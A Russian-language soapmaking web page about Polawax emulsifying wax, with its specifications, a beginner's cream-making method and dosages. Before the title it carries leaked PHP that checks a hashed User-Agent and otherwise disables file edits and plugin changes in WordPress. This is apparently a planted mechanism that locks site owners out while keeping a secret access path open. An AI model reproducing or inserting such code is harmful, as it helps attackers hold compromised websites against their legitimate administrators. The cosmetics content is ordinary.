if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Эмульсионный воск Polawax | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Эмульсионный воск Polawax

Этот эмульгатор является одним из самых простых и удобных в применении. Крем с ним получается однородным и стабильным даже в том случае, когда у вас нет навыков в «кремоварении». Прекрасно сочетается с другими эмульгаторами и гелеобразователями, хорошо переносит «соседство» в креме с активными ингредиентам

Ингредиенты для мыла - Эмульсионный воск Polawax Ингредиенты для мыла - Эмульсионный воск Polawax

Пола­вакс неион­ный эмуль­си­он­ный воск
Стра­на про­из­во­ди­тель: Великобритания
INCI: Emulsifying Wax NF
Тем­пе­ра­ту­ра плав­ле­ния: 48–52C
Уро­вень кис­лот­но­сти pH: 5,5–7 (3%)
Опи­са­ние: само­эмуль­ги­ру­ю­щая систе­ма рас­ти­тель­но­го происхождения.

Этот эмуль­га­тор явля­ет­ся одним из самых про­стых и удоб­ных в применении.

Крем с ним полу­ча­ет­ся одно­род­ным и ста­биль­ным даже в том слу­чае, когда у вас нет навы­ков в «кре­мо­ва­ре­нии». Пре­крас­но соче­та­ет­ся с дру­ги­ми эмуль­га­то­ра­ми и геле­об­ра­зо­ва­те­ля­ми, хоро­шо пере­но­сит «сосед­ство» в кре­ме с актив­ны­ми ингредиентами.

Поми­мо эмуль­ги­ру­ю­щих свойств, хоро­шо смяг­ча­ет кожу и предот­вра­ща­ет даль­ней­шее испа­ре­ние вла­ги . Может исполь­зо­вать­ся в дет­ской кос­ме­ти­ке и кос­ме­ти­ке для чув­стви­тель­ной кожи.

Эмуль­га­тор пред­на­зна­чен для систе­мы «масло/вода» (воды боль­ше, чем мас­ла, части­цы мас­ла окру­же­ны части­ца­ми воды). Поз­во­ля­ет созда­вать раз­лич­ные тек­сту­ры – от неж­ных жид­ких эмуль­сий до насы­щен­ных кре­мов и твёр­дых мас­ля­ных пли­ток. В мини­маль­ных кон­цен­тра­ци­ях (1–2%) помо­га­ет ста­би­ли­зи­ро­вать эмульсии.

Спо­соб применения

Т.к. этот эмуль­га­тор счи­та­ет­ся одним из самых про­стых и иде­аль­но под­хо­дит для пер­во­го само­дель­но­го кре­ма, рас­пи­шем спо­соб при­ме­не­ния подроб­но, что­бы про­цесс был поня­тен даже новичкам.

1) Сме­шать  твёр­дые и жид­кие мас­ла (если они есть в рецеп­те), растопить.

2) В нагре­тую мас­ля­ную фазу доба­вить эмуль­ги­ру­ю­щий воск и дождать­ся его пол­но­го расплавления.

3) Вод­ную фазу (дистил­ли­ро­ван­ную воду или гид­ро­ла­ты) мед­лен­но влить в мас­ля­ную, взби­вая при этом мини-мик­се­ром. Не забы­вай­те, что для систе­мы «мас­ло в воде» необ­хо­ди­мо коли­че­ство воды боль­шее, чем коли­че­ство масла.

4) Сме­ши­вать до пол­но­го осты­ва­ния при помо­щи мини-миксера.

5) Охла­дить и доба­вить эфир­ные мас­ла и дру­гие актив­ные ком­по­нен­ты (если они есть в рецепте).

Реко­мен­ду­е­мая про­из­во­ди­те­лем дози­ров­ка в кос­ме­ти­ке от 2 до 10 %. Для кре­ма­ис­поль­зу­ет­ся 8–10 % вос­ка, для молоч­ка – 5–7%, для пли­ток воз­мож­на кон­цен­тра­ция выше реко­мен­ду­е­мой, в зави­си­мо­сти от коли­че­ства твёр­дых масел в составе.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!